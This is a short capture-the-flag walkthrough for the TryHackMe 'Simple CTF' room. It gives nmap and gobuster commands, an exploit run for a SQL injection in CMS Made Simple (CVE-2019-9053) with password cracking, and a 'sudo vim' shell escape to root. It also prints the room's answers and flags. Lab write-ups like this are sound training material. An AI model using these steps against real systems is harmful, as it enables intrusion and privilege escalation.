Try Hack Me
  • Try Hack Me
  • Rooms
  • Tutorial
    • Welcome to TryHackMe
    • Welcome
    • Tutorial
    • Starting Out In Cyber Sec
    • Welcome
  • Capture The Flag
    • Advent of Cyber
      • Task 1 - 10
      • Task 11 - 20
      • Task 21 - 29
      • PDF - materials
    • Anonymous
    • Mnemonic
    • Bounty Hacker
    • Ignite
    • Pickle Rick
    • Simple CTF
    • Agent Sudo
    • Mr. Robot
  • Advent of Cyber II
    • A Christmas Crisis
    • The Elf Strikes Back!
    • Christmas Chaos
    • Santa's watching
    • Someone stole Santa's gift list!
    • Be careful with what you wish on a Christmas night
    • The Grinch Really Did Steal Christmas
    • What's Under the Christmas Tree?
    • Anyone can be Santa!
    • Don't be sElfish!
    • The Rogue Gnome
    • Ready, set, elf.
    • Coal for Christmas
    • Where's Rudolph?
    • There's a Python in my stocking!
    • Help! Where is Santa?
    • ReverseELFneering
    • The Bits of Christmas
    • The Naughty or Nice List
    • PowershELlF to the rescue
    • Time for some ELForensics
    • Elf McEager becomes CyberElf
    • The Grinch strikes again!
    • The Trial Before Christmas
    • Thank You
  • Linux
    • Linux Fundamentals Part 1
    • Linux Fundamentals Part 2
    • Linux Fundamentals Part 3
    • LinuxCTF - Linux Challenges
    • Learn Linux - wip
    • Find - wip
  • Windows
    • Intro to Windows
  • OSINT
    • Introductory Researching - wip
    • Google Dorking
    • OhSINT
    • Sublist3r
    • Searchlight - IMINT
    • Geolocating Images
  • Crypto
    • Hashing - Crypto 101
    • Encryption - Crypto 101
    • CrackTheHash - wip
  • Network
    • Introductory Networking
    • Nmap
    • Network Services - wip
    • Network Services 2 - wip
    • Networking - wip
    • Nmap - wip
    • TOR
  • Web
    • Web Fundamentals
  • Pentest
    • Pentest questionaire
  • Hardware
    • Dumping Router Firmware
  • HELP
  • Reverse
    • Reversing ELF
Powered by GitBook
On this page
  • INIT
  • How many services are running under port 1000?
  • What is running on the higher port?
  • FTP
  • HTTP
  • GOBUSTER
  • What's the CVE you're using against the application?
  • To what kind of vulnerability is the application vulnerable?
  • What's the password?
  • Where can you login with the details obtained?
  • What's the user flag?
  • Is there any other user in the home directory? What's its name?
  • What can you leverage to spawn a privileged shell?
  • What's the root flag?

Was this helpful?

  1. Capture The Flag

Simple CTF

https://tryhackme.com/room/easyctf

PreviousPickle RickNextAgent Sudo

Last updated 4 years ago

Was this helpful?

INIT

export easyctf=10.10.150.200
ping $easyctf

echo "10.10.150.200 easyctf.thm" >> /etc/hosts

How many services are running under port 1000?

nmap -T5 -p1-1000 easyctf.thm

2

What is running on the higher port?

nmap -sC -sV -T5 -p1-65535 easyctf.thm

ssh

FTP

HTTP

GOBUSTER

gobuster dir -u easyctf.thm -w /usr/share/wordlists/dirb/common.txt -q -t 15 -x php,html,txt

CMS Made Simple 2.2.8

What's the CVE you're using against the application?

CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

sqli

What's the password?

python3 easyctf.py -u http://easyctf.thm/simple --crack -wordlist /usr/share/wordlists/rockyou.txt

secret

Where can you login with the details obtained?

ssh

What's the user flag?

G00d j0b, keep up!

Is there any other user in the home directory? What's its name?

sunbath

What can you leverage to spawn a privileged shell?

sudo vim -c ':!/bin/sh'

vim

What's the root flag?

cat /root/root.txt

W3ll d0n3. You made it!

Logovim | GTFOBins